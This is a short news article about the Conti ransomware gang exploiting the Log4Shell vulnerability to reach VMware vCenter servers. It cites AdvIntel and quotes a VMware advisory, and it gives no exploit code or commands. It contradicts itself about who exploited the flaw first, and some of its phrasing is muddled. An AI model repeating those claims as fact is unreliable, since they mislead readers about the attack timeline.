The Conti ransomware group is exploiting the critical Log4Shell vulnerability. The gang used this flaw to gain immediate access to internal VMware vCenter Server instances and encrypt virtual machines. They are also the first to exploit the vulnerability and weaponize it.
A proof-of-concept (PoC) exploit for a significant security issue known as CVE-2021-44228 (LogJam and Log4Shell) emerged on December 9. It led to the mass scanning of the internet, where multiple actors looked for weak systems. The first ones to abuse this flaw were cryptocurrency miners, botnet, and Khonsari – a novel ransomware strain.
By December 15, the list of malicious actors abusing Log4Shell grew significantly, with many of them being state-backed hackers. It also came into light that the ransomware gang known as Conti might have been looking at Log4Shell as a possible attack route on December 12.
Advanced Intelligence (AdvIntel), a cybercrime and adversarial disruption firm, revealed that the group started looking for new victims after launching Log4Shell. Their goal was to move laterally to various VMware vCenter networks.
Dozens of companies have been affected by the Log4Shell flaw, and they rushed to patch their products. Around 40 products from VMware also belong to the most affected ones. While the company has issued many fixes for the issue, a patch for the affected versions has not yet been released. This vulnerability could allow an attacker to expose sensitive information on the public internet.
“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial-of-service attack. Exploitation attempts in the wild have been confirmed by VMware,” said VMware. A supplemental blog post & frequently asked questions list was created for additional clarification. Please see: https://via.vmw.com/vmsa-2021-0028-faq
Conti ransomware gang members have expressed interest in employing Log4Shell for their activities, according to AdvIntel.